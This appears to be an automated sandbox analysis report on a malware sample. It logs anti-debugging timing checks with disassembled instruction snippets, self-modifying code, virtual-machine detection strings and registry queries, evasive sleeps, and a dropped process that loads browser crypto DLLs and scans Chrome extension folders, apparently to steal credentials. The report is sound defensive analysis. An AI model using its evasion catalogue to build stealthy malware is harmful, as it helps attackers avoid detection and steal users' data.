Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D40AB8 second address: 4D40AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov cl, C8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DC0557 second address: 4DC055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB09C6 second address: 4DB09CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB083D second address: 4DB0843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0843 second address: 4DB0878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D76Fh 0x00000007 pushfd 0x00000008 jmp 00007FC9D915F4C4h 0x0000000d sbb ah, FFFFFF98h 0x00000010 jmp 00007FC9D915F4BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0878 second address: 4DB0880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0880 second address: 4DB0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0886 second address: 4DB088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB088A second address: 4DB088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB088E second address: 4DB08D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC9D8BCC16Dh 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC171h 0x00000018 or si, 0696h 0x0000001d jmp 00007FC9D8BCC171h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D500F1 second address: 4D50115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50115 second address: 4D50128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50128 second address: 4D50191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9D915F4C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC9D915F4C3h 0x00000019 and si, F00Eh 0x0000001e jmp 00007FC9D915F4C9h 0x00000023 popfd 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50191 second address: 4D501AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC178h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D501AD second address: 4D501F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f mov si, F301h 0x00000013 push ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9D915F4C0h 0x00000021 adc si, 8348h 0x00000026 jmp 00007FC9D915F4BBh 0x0000002b popfd 0x0000002c movzx eax, dx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C11 second address: 4DB0C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C15 second address: 4DB0C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C2C second address: 4DB0C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC16Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C5F second address: 4DB0C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C63 second address: 4DB0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C69 second address: 4DB0C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C6F second address: 4DB0C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0C73 second address: 4DB0D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007FC9D915F4C6h 0x00000017 and esi, 6EBEFA18h 0x0000001d jmp 00007FC9D915F4BBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ch, 0Dh 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007FC9D915F4BBh 0x0000002e push dword ptr [ebp+0Ch] 0x00000031 jmp 00007FC9D915F4C6h 0x00000036 push dword ptr [ebp+08h] 0x00000039 jmp 00007FC9D915F4C0h 0x0000003e push 14D8F9B9h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC9D915F4BCh 0x0000004a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0D09 second address: 4DB0D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007FC9D8BCC16Dh 0x0000000b xor si, CE76h 0x00000010 jmp 00007FC9D8BCC171h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor dword ptr [esp], 14D9F9BBh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC9D8BCC16Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DB0D4C second address: 4DB0D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: A5E910 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: BFED8B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C29F57 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C0E799 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Special instruction interceptor: First address: C86DD2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: E7E910 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 101ED8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 1049F57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 102E799 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 10A6DD2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: D0EA73 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: EACDEC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: EACADA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: ED5B9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Special instruction interceptor: First address: F3DF44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: 89E910 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A3ED8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A69F57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: A4E799 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Special instruction interceptor: First address: AC6DD2 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Code function: 2_2_04DB0C09 rdtsc

2_2_04DB0C09

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 3203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1307	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 822	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 2586	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Window / User API: threadDelayed 412

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

API coverage: 8.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6856	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6856	Thread sleep time: -130065s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6916	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6916	Thread sleep time: -124062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1828	Thread sleep count: 296 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1828	Thread sleep time: -8880000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1916	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1916	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5900	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5940	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5940	Thread sleep time: -126063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep count: 3203 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep time: -6409203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep count: 1307 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2224	Thread sleep time: -2615307s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep count: 822 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep time: -1644822s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep count: 2586 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3468	Thread sleep time: -5174586s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe TID: 9100	Thread sleep count: 110 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe TID: 9100	Thread sleep time: -660000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	11_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	11_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	11_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_00401710
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	11_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	11_2_00414050
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	11_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	11_2_004133C0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00401160 GetSystemInfo,ExitProcess,

11_2_00401160

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, RoamingFHJDBKJKFI.exe, 0000002F.00000002.3317110228.0000000000E8D000.00000040.00000001.01000000.00000016.sdmp, RoamingHJKECAAAFH.exe, 00000032.00000002.3101997661.0000000000A1F000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552x
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 00000024.00000002.3089031616.00000000027B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarep
Source: 6SoKuOqyNh.exe, 00000002.00000002.2246081856.0000000000BDF000.00000040.00000001.01000000.00000004.sdmp, explorti.exe, 00000004.00000002.2273472137.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, RoamingFHJDBKJKFI.exe, 0000002F.00000002.3317110228.0000000000E8D000.00000040.00000001.01000000.00000016.sdmp, RoamingHJKECAAAFH.exe, 00000032.00000002.3101997661.0000000000A1F000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1RECOVE~1470bankoRecoveryImprovedVMware20,11696487552x

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Thread information set: HideFromDebugger	Jump to behavior
